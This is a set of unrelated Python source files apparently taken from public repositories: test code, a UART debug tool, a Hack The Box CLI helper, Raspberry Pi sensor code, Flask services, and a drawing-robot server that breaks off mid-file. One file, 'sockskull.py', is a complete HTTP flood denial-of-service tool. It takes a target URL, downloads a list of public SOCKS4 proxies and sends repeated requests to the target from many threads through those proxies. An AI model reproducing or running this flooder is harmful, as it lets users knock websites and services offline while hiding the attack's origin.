client = UserSecretsClient()
def test_get_access_token_succeeds(self):
secret = '12345'
def call_get_access_token():
client = UserSecretsClient()
secret_response = client.get_bigquery_access_token()
self.assertEqual(secret_response, secret)
self._test_client(call_get_access_token,
'/requests/GetUserSecretRequest', {'Target': 1, 'JWE': _TEST_JWT}, secret=secret)
def test_get_access_token_handles_unsuccessful(self):
def call_get_access_token():
client = UserSecretsClient()
with self.assertRaises(BackendError):
client.get_bigquery_access_token()
self._test_client(call_get_access_token,
'/requests/GetUserSecretRequest', {'Target': 1, 'JWE': _TEST_JWT}, success=False)
|
symbolviewer.py | ###########################################################################
#
# Copyright 2019 Samsung Electronics All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
###########################################################################
from collections import OrderedDict
from operator import eq
import subprocess
import serial
import threading
import time
import sys
isExit = False
def rxfromUART(port):
global isExit
isStackInfo = False
length = len("unwind_backtrace_with_fp: [<")
while(isExit == False):
time.sleep(0.01)
lines = port.readlines()
if lines == None:
continue
for line in lines:
if line.find("unwind_backtrace_with_fp: Call Stack:") != -1:
isStackInfo = True
elif line.find("unwind_frame_with_fp: End of Callstack") != -1:
isStackInfo = False
if isStackInfo == True:
if line.find("unwind_backtrace_with_fp: [<") != -1:
#unwind_backtrace_with_fp: [<
addr = line[length: length + 10]
proc = subprocess.Popen(["addr2line" ,
"-e" ,
"../../build/output/bin/tinyara",
addr], stdout=subprocess.PIPE)
ouput, err = proc.communicate()
time.sleep(0.01)
sys.stdout.write( "%s \t: %s" % ((line), ouput.decode('utf-8')))
else:
sys.stdout.write( "%s" % (line))
def txtoUART(port, send):
if send.find("\n") != -1:
PORT.write((send).encode())
else:
PORT.write((send+"\n").encode())
def wait2commnad(port):
global isExit
cmd = ""
while(isExit == False):
time.sleep(0.1)
cmd = sys.stdin.readline()
cmd.strip()
if eq(cmd, "exit\n"):
isExit = True
break
txtoUART(port, cmd)
if (__name__ == '__main__'):
# init
PORT = serial.Serial(sys.argv[1], baudrate=115200, timeout=0.1)
rxthread = threading.Thread(target=rxfromUART,args=(PORT,))
rxthread.daemon = True
rxthread.start()
txthread = threading.Thread(target=wait2commnad, args=(PORT,))
txthread.daemon = True
txthread.start()
while(isExit == False):
time.sleep(0.1)
if (isExit == True):
txthread.join()
rxthread.join()
|
htb.py | #!/usr/bin/python
from bs4 import BeautifulSoup
import json
import threading
import requests
import time
from os.path import realpath, dirname
import sys
import netifaces as net
from chats import apikey
args = sys.argv
if len(args) == 1:
print """\033[96m[+] \033[92mTry These Commands:
\033[96m[+] \033[92mhtb chat {Starts a terminal chat client}
\033[96m[+] \033[92mhtb chat shout {See all messages like resets}
\033[96m[+] \033[92mhtb reset machine {Resets A Machine}
\033[96m[+] \033[92mhtb machine/challenge pro/sucks {rates a machine or challenge}
\033[96m[+] \033[92mhtb sendmsg yourmessage {send a quick message to shoutbox}
\033[96m[+] \033[92mhtb respect user {respects a user}
\033[96m[+] \033[92mhtb startvpn {starts openvpn in background}
\033[96m[+] \033[92mhtb ip {Shows your plain hackthebox ip}
\033[96m[+] \033[92mhtb stopvpn {stops openvpn}
\033[96m[+] \033[92mhtb updatevpn {updates hackthebox vpn}
\033[96m[+] \033[92mhtb switchvpn {Switch between htb vpn labs}
"""
exit()
from os import system
headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0'}
def updatevpn():
base_path = dirname(realpath(sys.argv[0]))+"/"
file = open(base_path+"cookies.txt","r")
cont = file.read()
f = json.loads(cont)
vpd = requests.get('https://www.hackthebox.eu/home/htb/access/ovpnfile', cookies=f,headers=headers)
ovpn = open(base_path+'htb.ovpn', 'w')
ovpn.write(vpd.content)
ovpn.close()
print "[+] Updated Vpn"
if args[1] == "chat":
system("clear")
print "\033[96m[+] \033[92mTip: You Can Send Any Message Just Type On The Terminal :) \n"
from getchats import *
get_message()
try:
arg2 = args[2]
except:
arg2 = ""
def background():
while True:
time.sleep(10)
if arg2 != "":
get_last_message(quite=False)
else:
get_last_message(quite=True)
threading1 = threading.Thread(target=background)
threading1.daemon = True
threading1.start()
help = '''
\033[92m[+]\033[97m \033[91mAvailable Commands:
\033[92m[+]\033[97m \033[91m/help \033[90m :: Returns this text
\033[92m[+]\033[97m \033[91m/respect \033[93m<username> \033[90m :: Gives respect to selected user.
\033[92m[+]\033[97m \033[91m/reset \033[93m<machine> \033[90m :: Resets the specified machine.
\033[92m[+]\033[97m \033[91m/cancel \033[93m<reset_id> \033[90m :: Cancels a pending reset.
\033[92m[+]\033[97m \033[91m/rate \033[93m<machine/challenge> \033[96m<pro/sucks> \033[90m :: Rates the machine accordingly.
\033[92m[+]\033[97m \033[91m/slap \033[93m<username> \033[90m :: Slaps the user.
\033[92m[+]\033[97m \033[91m/shame \033[93m<username> \033[90m :: Shames the user.
\033[92m[+]\033[97m \033[91m/beer \033[93m<username> \033[90m :: Offers a beer to user.
\033[92m[+]\033[97m \033[91m/milk \033[93m<username> \033[90m :: Offers a milk bottle to user.
\033[92m[+]\033[97m \033[91m/cocktail \033[93m<username> \033[90m :: Offers a cocktail to a stressed user.
\033[92m[+]\033[97m \033[91m/poke \033[93m<username> \033[90m :: Pokes a user.
\033[92m[+]\033[97m \033[91mAdmin-Only Commands:
\033[92m[+]\033[97m \033[91m/powerofthor \033[93m<username> \033[90m :: Bans resets/cancels/shouts of user for 5 minutes.\033[92m
'''
while True:
try:
mymessage = raw_input("\033[92m")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
if mymessage == "/help":
print help
elif mymessage == "":
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
elif mymessage == "/quite":
quite = False
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
else:
requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":mymessage})
except:
system("clear")
exit("Thank You")
elif args[1] == "reset":
try:
nameofbox = "/reset "+args[2]
r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofbox})
cont = r.content
if 'Invalid' in cont:
print "[!] Machine does not exist."
elif 'will be reset' in cont:
print "[+] reset requested successfully"
except:
nameofbox = raw_input("Name of box > ")
nameofbox = "/respect "+nameofbox
r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofbox})
cont = r.content
if 'Invalid' in cont:
print "[!] Machine does not exist."
elif 'will be reset' in cont:
print "[+] reset requested successfully"
elif args[1] == "respect":
try:
nameofuser = "/respect "+args[2]
r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofuser})
cont = r.content
if 'invalid user' in cont:
print "[!] User Not Found."
elif 'User respected' in cont:
print "[+] User respected successfully"
except:
nameofuser = raw_input("Name of user > ")
nameofuser = "/respect "+nameofuser
r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofuser})
cont = r.content
if 'invalid user' in cont:
print "[!] User Not Found."
elif 'User respected' in cont:
print "[+] User respected successfully"
elif args[1] == "rate":
try:
nameofbox = "/rate "+args[2] + " " + args[3]
r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofbox})
except:
rt = raw_input("rate pro/sucks > ")
nameofbox = raw_input("Name of box or challenge > ")
nameofbox = "/rate "+ nameofbox + " " + rt
r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofbox})
elif args[1] == "sendmsg":
try:
msg = args[2]
r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":msg})
cont = r.content
if 'success' in cont:
print "Message Sent!"
else:
print 'There was some problem'
except:
msg = raw_input('> ')
r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":msg})
cont = r.content
if 'success' in cont:
print "Message Sent!"
else:
print 'There was some problem'
elif args[1] == "startvpn":
cmd = "openvpn --config /tmp/htb.ovpn --daemon"
system(cmd)
print "[+] Started Vpn"
elif args[1] == "ip":
try:
net.ifaddresses('tun0')
ip = net.ifaddresses('tun0')[net.AF_INET][0]['addr']
print ip
except:
print "[+] Please connect first"
elif args[1] == "stopvpn":
system("pkill -9 openvpn")
system("pkill -9 openvpn")
print "[+] Stopped Vpn"
elif args[1] == "updatevpn":
updatevpn()
elif args[1] == "switchvpn":
base_path = dirname(realpath(sys.argv[0]))+"/"
file = open(base_path+"cookies.txt","r")
cont = file.read()
f = json.loads(cont)
r = BeautifulSoup(requests.get('https://www.hackthebox.eu/home/htb/access',cookies=f,headers=headers).content,"lxml")
labs = r.find_all('div',class_="panel-heading")
switch = []
for i in labs:
if 'Switch' in i.text:
switch.append(i)
for i in range(len(switch)):
print "[{id}] {name}".format(id=i, name=switch[i].text.strip())
id = raw_input("ID> ")
try:
if int(id) > (len(switch)-1):
print "[-] Please Chose From Above"
exit()
except:
print "[-] Please Chose From Above"
exit()
labname = labs[int(id)].contents[1].contents[1]['onclick'][11:][:-2]
requests.post('https://www.hackthebox.eu/api/labs/switch/'+labname,params={"api_token":apikey},headers=headers).content
print "[+] Changed To "+labs[int(id)].text.strip().split(' ')[1]
updatevpn()
else:
print "[-] Unknown Command"
|
sockskull.py | ###########################################
# This Script Is Code By GogoZin #
# Can Use In Stress Test #
# But Don't Attack Any Gov Site #
# If Want Me To Keep Update #
###########################################
import requests
import random
import time
import threading
from colorama import Fore
print(Fore.GREEN + """ .,:ccllllc:,.
.lOXWMMMMMMMMMWXOo,
.lKWMMMMMMMMMMMMMMMMNk:.
.oKWMMMMMMMMMMMMMMMMMMMMNx'
.xWMMMMMMMMMMMMMMMMMMMMMMMWO'
;KMMMMMMMMMMMMMMMMMMMMMMMMMWd.
:XNKXWMMMMMMMMMMMMMMMMMMNXXWk.
;Kx..:d0NMMMMMMMMMMMMXkc,.;0d.
.OO' .,oOXWMMMMNKkc' c0:
:KOc,.....:xXNNKd,....';oKk.
cXMWXK000XOlccdKK00KXNWMNc
.dWMMWX0XMNdcocckMMWX00NMNl
.oXX0o..oWWNNWNXNMMK; .oKx'
.... cNXNNXXXOKWx. ..
,KKKX000OKK;
'0KKX0KK0X0'
.OK0XKKK0XO.
.k00K0K00Xk.
ldxOxOkx0o
..',,;,',.
""")
print(" CC Attack Tool Using Requests Module")
print(" Code By GogoZin. -2019/8/2")
print(" Last Update In 2019/8/10")
#Code By GogoZin
def opth():
for i in range(thr):
x = threading.Thread(target=atk)
x.start()
print("Threads " + str(i+1) + " Created")
print("Wait A Few Seconds For Threads Ready To Attack ...")
time.sleep(3)
input("Press Enter To Launch Attack !")
global on
on = True
on = False
def main():
global pprr
global list
global proxy
global url
global pwr
global thr
global on
url = str(input(Fore.BLUE + "Target : " + Fore.WHITE))
thr = int(input(Fore.BLUE + "Threads : " + Fore.WHITE))
cho = str(input(Fore.BLUE + "Get Some Fresh Socks ? (y/n) : " + Fore.WHITE))
if cho =='y':
rsp = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&timeout=1000&country=all') #Code By GogoZin
with open('socks.txt','wb') as fp:
fp.write(rsp.content)
print(Fore.YELLOW + "Sucess Get Fresh Socks List !")
else:
pass
list = str(input(Fore.BLUE + "Socks List (socks.txt): " + Fore.WHITE))
if list =="":
list = 'socks.txt'
else:
list = str(list)
pprr = open(list).readlines()
print(Fore.BLUE + "Socks Count : " + Fore.WHITE + "%d " %len(pprr))
pwr = int(input(Fore.BLUE + "CC.Power (1-100) : " + Fore.WHITE))
opth()
def atk():
pprr = open(list).readlines()
proxy = random.choice(pprr).strip().split(":")
s = requests.session()
s.proxies = {}
s.proxies['http'] = ("socks4://"+str(proxy[0])+":"+str(proxy[1]))
s.proxies['https'] = ("socks4://"+str(proxy[0])+":"+str(proxy[1]))
time.sleep(10)
while True:
while on:
try:
s.get(url)
#Code By GogoZin
try:
for y in range(pwr):
s.get(url)
print(Fore.BLUE + "Socks CC Flood From ~[ " + Fore.WHITE + str(proxy[0])+":"+str(proxy[1]) + Fore.BLUE + " ] " + Fore.WHITE)
s.close
except:
s.close()
except:
s.close()
print(Fore.RED + "Can't Connet To This Socks . . . Skip ~>" + Fore.WHITE)
if __name__ == "__main__":
main()
|
test_connect.py | import pytest
import pdb
import threading
from multiprocessing import Process
from utils import *
CONNECT_TIMEOUT = 12
class TestConnect:
def local_ip(self, args):
'''
check if ip is localhost or not
'''
if not args["ip"] or args["ip"] == 'localhost' or args["ip"] == "127.0.0.1":
return True
else:
return False
def test_disconnect(self, connect):
'''
target: test disconnect
method: disconnect a connected client
expected: connect failed after disconnected
'''
res = connect.disconnect()
assert res.OK()
with pytest.raises(Exception) as e:
res = connect.server_version()
def test_disconnect_repeatedly(self, connect, args):
'''
target: test disconnect repeatedly
method: disconnect a connected client, disconnect again
expected: raise an error after disconnected
'''
if not connect.connected():
milvus = get_milvus(args["handler"])
uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
milvus.connect(uri=uri_value)
res = milvus.disconnect()
with pytest.raises(Exception) as e:
res = milvus.disconnect()
else:
res = connect.disconnect()
with pytest.raises(Exception) as e:
res = connect.disconnect()
def test_connect_correct_ip_port(self, args):
'''
target: test connect with corrent ip and port value
method: set correct ip and port
expected: connected is True
'''
milvus = get_milvus(args["handler"])
milvus.connect(host=args["ip"], port=args["port"])
assert milvus.connected()
def test_connect_connected(self, args):
'''
target: test connect and disconnect with corrent ip and port value, assert connected value
method: set correct ip and port
expected: connected is False
'''
milvus = get_milvus(args["handler"])
milvus.connect(host=args["ip"], port=args["port"])
milvus.disconnect()
assert not milvus.connected()
# TODO: Currently we test with remote IP, localhost testing need to add
def _test_connect_ip_localhost(self, args):
'''
target: test connect with ip value: localhost
method: set host localhost
expected: connected is True
'''
milvus = get_milvus(args["handler"])
milvus.connect(host='localhost', port=args["port"])
assert milvus.connected()
@pytest.mark.timeout(CONNECT_TIMEOUT)
def test_connect_wrong_ip_null(self, args):
'''
target: test connect with wrong ip value
method: set host null
expected: not use default ip, connected is False
'''
milvus = get_milvus(args["handler"])
ip = ""
with pytest.raises(Exception) as e:
milvus.connect(host=ip, port=args["port"], timeout=1)
assert not milvus.connected()
def test_connect_uri(self, args):
'''
target: test connect with correct uri
method: uri format and value are both correct
expected: connected is True
'''
milvus = get_milvus(args["handler"])
uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
milvus.connect(uri=uri_value)
assert milvus.connected()
def test_connect_uri_null(self, args):
'''
target: test connect with null uri
method: uri set null
expected: connected is True
'''
milvus = get_milvus(args["handler"])
uri_value = ""
if self.local_ip(args):
milvus.connect(uri=uri_value, timeout=1)
assert milvus.connected()
else:
with pytest.raises(Exception) as e:
milvus.connect(uri=uri_value, timeout=1)
assert not milvus.connected()
@pytest.mark.level(2)
@pytest.mark.timeout(CONNECT_TIMEOUT)
def test_connect_wrong_uri_wrong_port_null(self, args):
'''
target: test uri connect with port value wouldn't connected
method: set uri port null
expected: connected is True
'''
milvus = get_milvus(args["handler"])
uri_value = "tcp://%s:" % args["ip"]
with pytest.raises(Exception) as e:
milvus.connect(uri=uri_value, timeout=1)
@pytest.mark.level(2)
@pytest.mark.timeout(CONNECT_TIMEOUT)
def test_connect_wrong_uri_wrong_ip_null(self, args):
'''
target: test uri connect with ip value wouldn't connected
method: set uri ip null
expected: connected is True
'''
milvus = get_milvus(args["handler"])
uri_value = "tcp://:%s" % args["port"]
with pytest.raises(Exception) as e:
milvus.connect(uri=uri_value, timeout=1)
assert not milvus.connected()
# disable
def _test_connect_with_multiprocess(self, args):
'''
target: test uri connect with multiprocess
method: set correct uri, test with multiprocessing connecting
expected: all connection is connected
'''
uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
process_num = 10
processes = []
def connect(milvus):
milvus.connect(uri=uri_value)
with pytest.raises(Exception) as e:
milvus.connect(uri=uri_value)
assert milvus.connected()
for i in range(process_num):
milvus = get_milvus(args["handler"])
p = Process(target=connect, args=(milvus, ))
processes.append(p)
p.start()
for p in processes:
p.join()
def test_connect_repeatedly(self, args):
'''
target: test connect repeatedly
method: connect again
expected: status.code is 0, and status.message shows have connected already
'''
milvus = get_milvus(args["handler"])
uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
milvus.connect(uri=uri_value)
milvus.connect(uri=uri_value)
assert milvus.connected()
def test_connect_disconnect_repeatedly_once(self, args):
'''
target: test connect and disconnect repeatedly
method: disconnect, and then connect, assert connect status
expected: status.code is 0
'''
milvus = get_milvus(args["handler"])
uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
milvus.connect(uri=uri_value)
milvus.disconnect()
milvus.connect(uri=uri_value)
assert milvus.connected()
def test_connect_disconnect_repeatedly_times(self, args):
'''
target: test connect and disconnect for 10 times repeatedly
method: disconnect, and then connect, assert connect status
expected: status.code is 0
'''
times = 10
milvus = get_milvus(args["handler"])
uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
milvus.connect(uri=uri_value)
for i in range(times):
milvus.disconnect()
milvus.connect(uri=uri_value)
assert milvus.connected()
# TODO: enable
def _test_connect_disconnect_with_multiprocess(self, args):
'''
target: test uri connect and disconnect repeatly with multiprocess
method: set correct uri, test with multiprocessing connecting and disconnecting
expected: all connection is connected after 10 times operation
'''
uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
process_num = 4
processes = []
def connect(milvus):
milvus.connect(uri=uri_value)
milvus.disconnect()
milvus.connect(uri=uri_value)
assert milvus.connected()
for i in range(process_num):
milvus = get_milvus(args["handler"])
p = Process(target=connect, args=(milvus, ))
processes.append(p)
p.start()
for p in processes:
p.join()
def test_connect_param_priority_no_port(self, args):
'''
target: both host_ip_port / uri are both given, if port is null, use the uri params
method: port set "", check if wrong uri connection is ok
expected: connect raise an exception and connected is false
'''
milvus = get_milvus(args["handler"])
uri_value = "tcp://%s:39540" % args["ip"]
with pytest.raises(Exception) as e:
milvus.connect(host=args["ip"], port="", uri=uri_value)
def test_connect_param_priority_uri(self, args):
'''
target: both host_ip_port / uri are both given, if host is null, use the uri params
method: host set "", check if correct uri connection is ok
expected: connected is False
'''
milvus = get_milvus(args["handler"])
uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
with pytest.raises(Exception) as e:
milvus.connect(host="", port=args["port"], uri=uri_value, timeout=1)
assert not milvus.connected()
# Disable, (issue: https://github.com/milvus-io/milvus/issues/288)
def _test_connect_param_priority_both_hostip_uri(self, args):
'''
target: both host_ip_port / uri are both given, and not null, use the uri params
method: check if wrong uri connection is ok
expected: connect raise an exception and connected is false
'''
milvus = get_milvus(args["handler"])
uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
with pytest.raises(Exception) as e:
res = milvus.connect(host=args["ip"], port=39540, uri=uri_value, timeout=1)
logging.getLogger().info(res)
# assert not milvus.connected()
def _test_add_vector_and_disconnect_concurrently(self):
'''
Target: test disconnect in the middle of add vectors
Method:
a. use coroutine or multi-processing, to simulate network crashing
b. data_set not too large incase disconnection happens when data is underd-preparing
c. data_set not too small incase disconnection happens when data has already been transferred
d. make sure disconnection happens when data is in-transport
Expected: Failure, get_table_row_count == 0
'''
pass
def _test_search_vector_and_disconnect_concurrently(self):
'''
Target: Test disconnect in the middle of search vectors(with large nq and topk)multiple times, and search/add vectors still work
Method:
a. coroutine or multi-processing, to simulate network crashing
b. connect, search and disconnect, repeating many times
c. connect and search, add vectors
Expected: Successfully searched back, successfully added
'''
pass
def _test_thread_safe_with_one_connection_shared_in_multi_threads(self):
'''
Target: test 1 connection thread safe
Method: 1 connection shared in multi-threads, all adding vectors, or other things
Expected: Functional as one thread
'''
pass
class TestConnectIPInvalid(object):
"""
Test connect server with invalid ip
"""
@pytest.fixture(
scope="function",
params=gen_invalid_ips()
)
def get_invalid_ip(self, request):
yield request.param
@pytest.mark.level(2)
@pytest.mark.timeout(CONNECT_TIMEOUT)
def test_connect_with_invalid_ip(self, args, get_invalid_ip):
milvus = get_milvus(args["handler"])
ip = get_invalid_ip
with pytest.raises(Exception) as e:
milvus.connect(host=ip, port=args["port"], timeout=1)
assert not milvus.connected()
class TestConnectPortInvalid(object):
"""
Test connect server with invalid ip
"""
@pytest.fixture(
scope="function",
params=gen_invalid_ports()
)
def get_invalid_port(self, request):
yield request.param
@pytest.mark.level(2)
@pytest.mark.timeout(CONNECT_TIMEOUT)
def test_connect_with_invalid_port(self, args, get_invalid_port):
'''
target: test ip:port connect with invalid port value
method: set port in gen_invalid_ports
expected: connected is False
'''
milvus = get_milvus(args["handler"])
port = get_invalid_port
with pytest.raises(Exception) as e:
milvus.connect(host=args["ip"], port=port, timeout=1)
assert not milvus.connected()
class TestConnectURIInvalid(object):
"""
Test connect server with invalid uri
"""
@pytest.fixture(
scope="function",
params=gen_invalid_uris()
)
def get_invalid_uri(self, request):
yield request.param
@pytest.mark.level(2)
@pytest.mark.timeout(CONNECT_TIMEOUT)
def test_connect_with_invalid_uri(self, get_invalid_uri, args):
'''
target: test uri connect with invalid uri value
method: set port in gen_invalid_uris
expected: connected is False
'''
milvus = get_milvus(args["handler"])
uri_value = get_invalid_uri
with pytest.raises(Exception) as e:
milvus.connect(uri=uri_value, timeout=1)
assert not milvus.connected()
|
distancia.py | import RPi.GPIO as GPIO
import time
import threading
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
ECHO_DIR = 29
TRIG_DIR = 31
ECHO_ESQ = 35
TRIG_ESQ = 37
distancia_cm_esquerda = 0
distancia_cm_direita = 0
def setup_sensor_som():
GPIO.setup(ECHO_DIR, GPIO.IN)
GPIO.setup(TRIG_DIR, GPIO.OUT)
GPIO.setup(ECHO_ESQ, GPIO.IN)
GPIO.setup(TRIG_ESQ, GPIO.OUT)
def roda_medicao():
#while True:
time.sleep(0.5)
t1 = threading.Thread(target=pulso_esquerdo,args=())
t1.start()
t2 = threading.Thread(target=pulso_direito,args=())
t2.start()
while t1.isAlive() | t2.isAlive():
print("Processando")
return get_distancia()
def pulso_esquerdo():
global distancia_cm_esquerda
distancia_cm_esquerda = 0
GPIO.output(TRIG_ESQ, GPIO.HIGH)
time.sleep (0.000010)
GPIO.output(TRIG_ESQ, GPIO.LOW)
while GPIO.input(ECHO_ESQ) == 0:
pulso_inicial_esquerda = time.time()
while GPIO.input(ECHO_ESQ) == 1:
pulso_final_esquerda = time.time()
duracao_pulso_esquerda = pulso_final_esquerda - pulso_inicial_esquerda
distancia_cm_esquerda = 34300 * (duracao_pulso_esquerda/2)
distancia_cm_esquerda = round(distancia_cm_esquerda, 0)
def pulso_direito():
global distancia_cm_direita
distnacia_cm_direita = 0
GPIO.output(TRIG_DIR, GPIO.HIGH)
time.sleep (0.000010)
GPIO.output(TRIG_DIR, GPIO.LOW)
while GPIO.input(ECHO_DIR) == 0:
pulso_inicial_direita = time.time()
while GPIO.input(ECHO_DIR) == 1:
pulso_final_direita = time.time()
duracao_pulso_direita = pulso_final_direita - pulso_inicial_direita
distancia_cm_direita = 34300 * (duracao_pulso_direita/2)
distancia_cm_direita = round(distancia_cm_direita, 0)
def get_distancia():
print("Esquerda: "+str(distancia_cm_esquerda))
print("Direita: "+str(distancia_cm_direita))
if(distancia_cm_esquerda < distancia_cm_direita):
return distancia_cm_esquerda
else:
return distancia_cm_direita
#setup_sensor()
#roda_medicao()
#get_distancia()
|
index.py | from flask import Flask
from flask import jsonify, abort
from flask import request
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address, get_ipaddr
from flask_cors import CORS, cross_origin
from queue import Queue
import threading
import waitingtimes
import hashlib
import json
app = Flask(__name__)
q_detail = Queue()
limiter = Limiter(
app,
key_func=get_ipaddr,
default_limits=["10000 per day", "1000 per hour"]
)
cors = CORS(app)
app.config['CORS_HEADERS'] = 'Content-Type'
# rate limit 10/sec
@app.route("/geocode", methods=["GET"])
@cross_origin()
def get_geocode_address():
"""
retrieve information, from lat and lng, about the location
"""
lat = request.args.get("lat")
lng = request.args.get("lng")
if (lng == None or lat == None):
abort(400, "You need to provide at least your gps coords")
try:
response = waitingtimes.get_address_from_geocode(lat, lng)
except Exception as e:
abort(500, e)
return jsonify(response)
def worker_fulldetail():
"""
worker for the queue; it will serve the results then
"""
global q_detail, formattedPlaces
while True:
item = q_detail.get()
try:
formattedPlaces.append(waitingtimes.get_by_fulldetail(item))
except Exception as e:
print(e)
q_detail.task_done()
@app.route("/places/get-waiting-times", methods=["POST"])
@cross_origin()
def get_place_from_place_name_address():
wait_times = waitingtimes.get_by_fulldetail(request.json)
return jsonify(wait_times)
@app.route("/places/get-by-name", methods=["GET"])
@cross_origin()
def get_places_by_name():
places = []
q = request.args.get("q") # supermarket or pharmacy
address = request.args.get("address") # porta nuova, milano
if (q == None or address == None):
abort(400, "You need to provide your query string and your address")
item = {
"place_id": "",
"formatted_address": address,
"name": q,
"types": "",
"place_types": "",
"geometry": {
"location": {
"lat": "",
"lng": ""
}
}
}
result = waitingtimes.get_by_fulldetail(item, True)
result["place_id"] = hashlib.md5((str(result["coordinates"]["lat"])+str(result["coordinates"]["lng"])).encode("utf-8")).hexdigest()
places.append(result)
return jsonify(places)
@app.route("/places/explore", methods=["GET"])
@cross_origin()
def get_places_from_google():
global q_detail, formattedPlaces
QUERY_SEARCH = "{} near {} open now"
q = request.args.get("q") # supermarket or pharmacy
address = request.args.get("address") # porta nuova, milano
if (q == None or address == None):
abort(400, "You need to provide your query string and your address")
try:
places = waitingtimes.get_places_from_google(QUERY_SEARCH.format(q, address))
except Exception as e:
abort(500, e)
formattedPlaces = []
if (len(places) > 0):
for place in places:
if (place["name"] == None):
continue
# formattedPlaces.append({
# "place_id": hashlib.md5((str(place["location"]["lat"])+str(place["location"]["lng"])).encode("utf-8")).hexdigest(),
# "formatted_address": place["address"],
# "name": place["name"],
# "types": place["categories"],
# "place_types": place["place_types"],
# "geometry": {
# "location": {
# "lat": place["location"]["lat"],
# "lng": place["location"]["lng"]
# }
# }
# })
q_detail.put({
"place_id": hashlib.md5((str(place["location"]["lat"])+str(place["location"]["lng"])).encode("utf-8")).hexdigest(),
"formatted_address": place["address"],
"name": place["name"],
"types": place["categories"],
"place_types": place["place_types"],
"geometry": {
"location": {
"lat": place["location"]["lat"],
"lng": place["location"]["lng"]
}
}
})
q_detail.join()
return jsonify(formattedPlaces)
@app.route("/logger", methods=["POST"])
@cross_origin()
def save_client_log():
try:
log = request.json
with(open("/tmp/covid-client-map.log", "a")) as f:
log["remote_addr"] = get_ipaddr()
f.write(json.dumps(log) + "\n")
f.close()
except Exception as e:
print(e)
return jsonify({"ok": 200})
""" @app.route("/places/browse", methods=["GET"])
def get_places_from_here():
lat = request.args.get("lat")
lng = request.args.get("lng")
if (lng == None or lat == None):
abort(400, "You need to provide at least your gps coords (lat, lng)")
try:
places = waitingtimes.get_places_from_here({
"types": ["food-drink", "pharmacy", "post-office", "postal-area"],
"location": {
"lat": lat,
"lng": lng
},
"radius": 6000
})
except Exception as e:
abort(500, e)
formattedPlaces = []
if (len(places) > 0):
for x in range(0, len(places)-1):
print("processing: " + places[x]["title"])
formattedPlaces.append(
waitingtimes.get_by_fulldetail({
"accepted_place_type": ["bakery", "bank", "bar", "cafe", "doctor", "drugstore", "food", "health", "hospital", "meal_delivery", "meal_takeaway", "pharmacy", "post_office", "postal_code", "postal_town", "restaurant", "shopping_mall", "supermarket", "grocery_store", "discount_supermarket", "supermarket", "grocery"],
"place_id": places[x]["id"],
"formatted_address": places[x]["vicinity"].replace("\n", " "),
"name": places[x]["title"],
"types": places[x]["category"]["id"],
"geometry": {
"location": {
"lat": places[x]["position"][0],
"lng": places[x]["position"][1]
}
}
})
)
return jsonify(formattedPlaces) """
if __name__ == '__main__':
while (threading.active_count() <= 60):
break
try:
t = threading.Thread(target=worker_fulldetail)
t.daemon = True
t.start()
except Exception as e:
print(e)
app.run(port=2354, threaded=True)
|
server.py | from __future__ import print_function
from flask import Flask, jsonify, request
from flask_socketio import SocketIO, emit
from collections import namedtuple
from sendgcode import GCodeSender
import sys
import time
import threading
import math
app = Flask(__name__)
app.config['SECRET_KEY'] = 'Idontcareaboutsecurityinthisapp'
socketio = SocketIO(app)
sids = set()
bufferData = threading.Event()
alive = True
buffer = []
BUFFER_GCODE = 'g'
BUFFER_CALLBACK = 'c'
BUFFER_MESSAGE = 'm'
BUFFER_MOVE_XY = 'xy'
BUFFER_MOVE_Z = 'z'
BUFFER_SET_XYZ = 'sxyz'
BUFFER_STEPPERS = 'S'
# positions in mm
home = (28.641,220.647,10)
Tool = namedtuple('Tool', ['x','y','wiggleAxis','wiggleDistance','wiggleIterations'])
Rect = namedtuple('Rect', ['x0','y0','width','height'])
def RTool(x0,y0,w,h):
return Tool(x0+w/2,y0+h/2,w,h)
downZ = 0
upZ = 15
stepsPerMM = 17.78
colorVerticalSpacing = 25.564
color0Y = 176.911
colorX = 15.094
penUpSpeed=40
penDownSpeed=35
zSpeed=15
motors = False
tools = { "water0": Tool(8.659+55.269/2,169.548+55.269/2,'y', 0.3, 2),
"water1": Tool(8.659+55.269/2,97.606+55.269/2,'y', 0.3, 2),
"water2": Tool(8.659+55.269/2,25.663+55.269/2,'y', 0.3, 2),
"color0": Tool(colorX, color0Y-colorVerticalSpacing*0, 'xy', 17, 4),
"color1": Tool(colorX, color0Y-colorVerticalSpacing*1, 'xy', 17, 4),
"color2": Tool(colorX, color0Y-colorVerticalSpacing*2, 'xy', 17, 4),
